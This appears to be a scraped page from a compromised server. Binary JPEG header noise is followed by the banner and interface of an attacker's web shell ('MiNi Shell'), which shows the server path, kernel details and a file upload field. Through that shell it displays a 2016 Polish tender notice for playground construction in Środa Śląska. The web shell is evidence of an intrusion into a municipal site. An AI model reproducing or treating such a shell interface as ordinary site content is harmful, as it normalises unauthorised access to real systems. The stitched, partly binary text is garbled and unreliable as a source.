JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160913/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160913/307663-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 307663 - 2016
              z dnia 2016-09-13 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Środa Śląska: Budowa nowych i doposażenie istniejących placów zabaw na terenie miast ai gminy Środa Śląska<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina i Miasto Środa Śląska, krajowy numer identyfikacyjny
              69291493227000, ul.
              Plac Wolności 
              5,
              55300  
              Środa Śląska, woj.
              dolnośląskie, państwo
              , tel.
              713 960 724, e-mail
              izp_zap@srodaslaska.pl, faks
              713 173 405.
              <br />
              Adres strony internetowej (URL): http://bip.srodaslaska.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.srodaslaska.</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />składanie oferty odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe (Dz. U. poz. 1529 oraz z 2015 r. poz. 1830), osobiście lub za pośrednictwem posłańca<br />
                Adres:
                <br />Urząd Miejski Wydział Zamówień Publicznych pok. B-13 55-300 Środa Śląska, Pl. Wolności 5 </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Budowa nowych i doposażenie istniejących placów zabaw na terenie miast ai gminy Środa Śląska<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest dostawa wraz z montażem  urządzeń zabawowych wraz z wykonaniem infrastruktury bezpieczeństwa :

CZĘŚĆ I PRZEDMIOTU ZAMÓWIENIA: Plac zabaw  przy ul. Stacyjnej w Środzie Śląskiej. 
Plac zabaw posiada nawierzchnię z piasku, zamontowane urządzenia zabawowe, ogrodzenie panelowe wys. 1,1 m  z furtką 
Zakres prac do wykonania :
a) Uzupełnienie wyposażenia placu zabaw polegające na dostawie i montażu:

	Huśtawki łańcuchowej  z siedziskiem  typu bocianie gniazdo   szt.1 
	Konstrukcja z rur stalowych ocynkowana metodą ogniową i malowana proszkowo, siedzisko 	bocianie gniazdo, łańcuchy ze stali nierdzewnej, układ wahadłowy nie wymagający 	konserwacji, 	ewentualne wypełnienia (niewymagane)  z tworzywa HDPE, długość zawiesi 	1,50 m,

	Karuzeli ażurowej z kierownicą  szt.1
	Konstrukcja z rur stalowych ocynkowana metodą ogniową i malowana proszkowo, średnica 	min. 	1,50 m, siedziska z płyty HDPE ,podłoga wykonana z blachy aluminiowej ryflowanej, 	układ 	łożyskowy nie wymagający konserwacji,ewentualne wypełnienia (niewymagane)  z 	tworzywa HDPE,  talerz napędowy ze stali nierdzewnej

	Ławki z oparciem   2 szt.
	Konstrukcja z rur stalowych ocynkowana metodą ogniową i malowana proszkowo, siedzisko z 	desek 	z drewna liściastego zabezpieczonego impregnatem o długości min. 1,9 i szerokości 	min. 0,46 m

	Kosza  1 szt
	Metalowy z daszkiem o pojemności min. 30 l

b) Powiększenie powierzchni placu zabaw poprzez:
	rozbiórkę i ponowny montaż istniejącego ogrodzenia panelowego na odcinku 16 mb ( przesunięcie dwóch boków)
	dostawę z montażem ogrodzenia panelowego o parametrach:
Panel ogrodzeniowy  wymiary 1230 mm x 2500 mm, typ ZPO2 z wygięciami wzmacnianymi z drutu poziomego i pionowego fi 4,8 mm, oczka 50 mm x 200 mm. 
Słupki systemowe z zaślepką  wymiary 60 mm x 40 mm, długość 1700 mm. 
Uchwyty montażowe wraz z kompletem śrub, nakrętek i podkładem ocynkowanych.
Wszystkie elementy zabezpieczone antykorozyjnie poprzez ocynkowanie i dodatkowo malowane proszkowo na kolor RAL 6005

c) Uzupełnienie podłoża piaskowego na powiększonej powierzchni placu zabaw poprzez :
	dostawę wraz z korytowaniem i rozplantowaniem piasku na  powiększanej powierzchni istniejącego placu zabaw  o łącznej powierzchni 8,4 m2.  
Podłoże z piasku płukanego frakcja  0,2-2 mm. Grubość warstwy piasku  30 cm. Dostarczony piasek nie powinien zawierać cząstek mułu i gliny oraz winien być dopuszczony do stosowania na placach zabaw.

d) Wykonanie chodnika i uzupełnienie obrzeży poprzez:
	dostawa z montażem obrzeży betonowych o wymiarach 20 x 6 cm  pod istniejącym i nowo wykonanym ogrodzeniem panelowym na łącznej długości 73,38 mb
	wykonanie koryta, podsypki piaskowej grubości 5 cm pod chodnik
	wykonanie chodnika z kostki betonowej  typu 40 (lub równoważnej) grubości 6 cm z wypełnieniem spoin piaskiem . Powierzchnia chodnika  7,1 m2

Załączony przedmiar robót jest dokumentem pomocniczym do oszacowania wartości zamówienia. 

Do oferty wykonawca może zawierać wypełniony kosztorys oraz  jednostkowe ceny (obejmujące łącznie wszystkie roboty i materiały) :
	dostawy wraz z  montażem poszczególnych  urządzeń zabawowych  w zł/ szt
	dostawy wraz z montażem ogrodzenia panelowego w zł/mb
	wykonania chodnika z kostki betonowej   w zł/ m2
	wykonania obrzeża   w zł/mb
	wykonania podłoża piaskowego    w zł/m2
 

CZĘŚĆ II  PRZEDMIOTU ZAMÓWIENIA:  Plac zabaw w miejscowości Zakrzów 
Zakres prac do wykonania :
a) Uzupełnienie wyposażenia placu zabaw polegające na dostawie i montażu:

	Zjeżdżalni  szt..1
	Konstrukcja z rur stalowych ocynkowana metodą ogniową i malowana proszkowo, ślizg z 	blachy 	nierdzewnej długości min. 2,2 m , szerokości min. 0,5 m, wysokość  1,5 m, wypełnienia 	z tworzywa HDPE, podłoga ze sklejki wodoodpornej, schodki  gumowane lub z aluminiowej 	blachy 	antypoślizgowej. Maksymalna długość urządzenia 432,5 cm.

	Urządzenia wspinaczkowego typu Kopuła wspinaczkowa  szt.1
	Konstrukcja z rur stalowych ocynkowana metodą ogniową i malowana proszkowo, panele 	wspinaczkowe z tworzywa HDPE tworzące półkulę  poszczególne elementy w rożnych 	kolorach, średnica ok. fi 320 cm, wysokość ok. 150 cm, Do celów poglądowych podaje się wzór 	wyglądu urządzenia:  FUX SYSTEM RC.020 Kopuła.

b) Wykonanie podłoża piaskowego na  strefach bezpieczeństwa pod montowanymi urządzeniami poprzez :
	dostawę wraz z korytowaniem i rozplantowaniem piasku na  powierzchni wymaganych przepisami stref bezpieczeństwa.
Podłoże z piasku płukanego frakcja  0,2-2 mm. Grubość warstwy piasku  30 cm. Dostarczony piasek nie powinien zawierać cząstek mułu i gliny oraz winien być dopuszczony do stosowania na placach zabaw.


WYMAGANIA DO CZĘŚCI    I   i    II :

Dostarczone urządzenia zabawowe powinny spełniać następujący wymogi:
	posiadać certyfikaty zgodności z normą PN-EN 1176 
	urządzenia winny być jednoznacznie oznakowane numerem katalogowym pozwalającym na ich identyfikację  w karcie technicznej urządzenia  oraz tym samym numerem katalogowym w certyfikatach zgodności z normą PN-EN  1176
	na urządzeniach, które są zainstalowane w podłożu powinien być umieszczony przez producenta czytelny znak poziomu podstawowego. Wskazuje on wysokość, na jakiej montaż gwarantuje stabilność sprzętu (znak ten powinien być równy z nawierzchnią lub płaszczyzną zabawy). 
	urządzenia powinny być oznakowane nazwą i adresem producenta lub upoważnionego przedstawiciela,numerem kolejnym, pozwalającym na indywidualną identyfikację (metryczki urządzenia i roku produkcji) oraz numerem i datą normy, której wymogom odpowiadają.
	montaż urządzeń zgodny z zatwierdzoną instrukcją

Wykonawca przekaże po wykonaniu robót:
	dokumentację techniczną, z kartami informacyjnymi o konstrukcji urządzeń , ich wymiarach,użytych materiałach, farbach i lakierach ,
	instrukcję użytkowania i montażu, włącznie z danymi na temat bezpiecznych odległości pomiędzy urządzeniami ,
	certyfikaty , badania i inne dokumenty potwierdzające zgodność sprzętu z normą  PN-EN 1176 
	pisemne potwierdzenie kompletności wykonania prac objętych zamówieniem i zgodności montażu z normą PN-EN 1176 ,
	 wypełnioną gwarancję jakości,  gwarancja na min. 36 m-cy (załącznik pn. Gwarancja jakości)

Wspólny Słownik Zamówień (CPV):
Kod CPV :
37535200-9  Wyposażenie placów zabaw    
45112723-9 Roboty w zakresie kształtowania placów zabaw 

Zamawiający nie wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących czynności w zakresie realizacji zamówienia. 
<br /><br /><b>II.5) Główny kod CPV: </b>45112723-9<br /><b> Dodatkowe kody CPV:</b>37535200-9<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje udzielenie zamówienia określonego w art. 67 ust. 1 pkt 7 ustawy PZP do wysokości 3 000,00 zł brutto,  którego celem jest częściowa wymiana dostarczonych produktów lub instalacji albo zwiększenie bieżących dostaw lub rozbudowa istniejących instalacji, jeżeli zmiana wykonawcy zobowiązywałaby zamawiającego do nabywania materiałów o innych właściwościach technicznych, co powodowałoby niekompatybilność techniczną lub nieproporcjonalnie duże trudności techniczne w użytkowaniu i utrzymaniu tych produktów lub instalacji. <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/10/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia warunków w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia warunków w tym zakresie. <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada niezbędną wiedzę i doświadczenie do wykonania przedmiotu zamówienia, tj.:
wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej dwie roboty, których przedmiotem była dostawa i montaż urządzeń na place zabaw o wartości nie mniejszej niż
Część 1: 20 000,00 zł brutto
Część 2: 10 000,00 zł brutto 
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">a) oświadczenie wykonawcy o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 pkt 12-23 ustawy Pzp.
b) odpis z właściwego rejestru lub centralnej ewidencji informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. Oświadczenia złożonego przez Wykonawcę, stanowiącego Załącznik nr 2 do SIWZ.
2. wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty; <br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Zamawiający żąda przedstawienia następujących dokumentów:
a) Karty techniczne urządzeń z numerem katalogowym,
b) Na urządzenia zabawowe -Certyfikaty zgodności z normą PN-EN  1176 z umieszczonymi na nich numerami katalogowymi widniejącymi na w/w kartach technicznych
c)	Na kosz i ławki  deklaracje zgodności z normą PN-EN  1176 z umieszczonymi na nich numerami katalogowymi widniejącymi na w/w kartach technicznych
d) instrukcję montażową dla poszczególnych urządzeń (wymiary prefabrykatów betonowych
,wylewek, głębokości montażu) z oświadczeniem, że  zapewnia on bezpieczeństwo użytkowania.
e) wizualizację proponowanych urządzeń zabawowych; (np. fotografie) 
Część 1: 
- Huśtawki łańcuchowej z siedziskiem typu bocianie gniazdo;
- Karuzeli ażurowej z kierownicą.
Część 2: 
- Zjeżdżalni;
- Urządzenia wspinaczkowego typu Kopuła wspinaczkowa.
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Formularz ofertowy; Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia; W terminie 3 dni od zamieszczenia na stronie internetowej zamawiającego informacji z otwarcia ofert, o której mowa w art. 86 ust.5 ustawy PZP, Wykonawca zobowiązany jest przekazać Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt. 23 ustawy PZP Zał. nr 3 do SIWZ. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
